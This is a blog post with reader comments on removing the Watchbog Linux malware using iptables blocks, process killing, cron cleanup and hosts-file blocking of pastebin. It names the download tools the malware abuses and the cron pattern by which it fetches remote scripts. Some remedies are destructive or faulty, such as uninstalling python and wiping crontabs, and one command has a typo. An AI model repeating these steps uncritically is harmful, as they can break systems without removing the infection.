Saturday, 10 November 2018

Blocking Watchbog Malware/Ransomware with IPTables on Linux

Block the IP by the following commands.

iptables -A INPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -s 104.20.208.21 -j DROP

iptables -A OUTPUT -j DROP -d 104.20.208.21

Now save the newly added IPtables configuration with below command.

/sbin/service iptables save

Additionally If you don't have any Application dependencies you can uninstall the below packages.

wget
curl
python

If you have dependences then, rename the binaries.
e.g.

#mv /usr/bin/curl /usr/bin/lruc

same for 'wget' and 'python'. 

Yum will not work as python is renamed or removed

This is a malware/ramsonware. You must delete it from your system, Process and files.


It runs under any user or root user, find the process called "watchbog".

You can find this username with "top" or in output of this comand:

ps aux | grep watchbog

Then kill with -9 the process sustes, use the below command

ps -ef | grepwatchbog

kill -9 <PID>


Then look at cron job of this user:

crontab -u username -l

If it has this string

* * * * https://pastebin.com/

delete all by

crontab -r -u username

Then delete these files

/usr/bin/watchbog


Then delete these folders

/tmp/*timesyncc.service*


10 comments:

  1. Greetings
    I have a recurring instance of this "watchbog" infection.
    I have taken steps to cripple it. However, I should like to ask you if you have any idea how it invades a server?

    ReplyDelete
  2. I want to find out too, how i got infected!?

    my temporary fix is to run a loop inside a screen session to kill watchbog as it reappears.
    1) enter a new screen session by typing: screen
    2) grant sudo permissions by typing: sudo su
    3) write this oneliner: while true ; do killall watchbog ; done
    4) then press CTRL+A+D key combo, and the screen session will continue run in background, so the process gets killed instantly if reappears.

    ReplyDelete
  3. Hi Sudhakar,

    I followed all the steps except uninstalling curl and python. With no luck Watchbog process is reappearing.
    Looking at the temporary solution provided by one of the comments I am killing watchbog inside a while loop but in single screen session.

    $ while true ; do killall watchbog ; done

    And I am keeping session open in puTTY.
    Please update if you find any permanent fix.

    Thank you for the post.

    ReplyDelete
  4. Also, Blocking IP address using iptables is not helping as IP is getting changed every time I kill the process.

    ReplyDelete
  5. OK, so we installed a fresh UBUNTU 18.04.1, with fresh webserver packages. Copied WWW and SQl data and ITS BACK!!!, so probably this WATCHBOG virus infects the system thru the web services, but that really sounds impossible.
    On the new server, port 22 is open only from certain IP`s
    Passwords are different than previous server. the only thing witch got transffered is WWW-DATA and SQL

    ReplyDelete
    Replies
    1. It was probably in your www-data folder.

      Delete
  6. I followed above steps. But instead of IP tables I used our cloud provider's external firewall to block internet access.
    After that I proceeded as you mentioned but the virus kept coming back.
    I then realized it downloaded scripts from pastebin.
    I pointed pastebin.com and gitee.com to localhost in /etc/hosts. After that it stopped.

    ReplyDelete
    Replies
    1. "I pointed pastebin.com and gitee.com to localhost in /etc/hosts." This is the best idea !

      It gives me some time before re-installing !
      Thanks a lot !

      Delete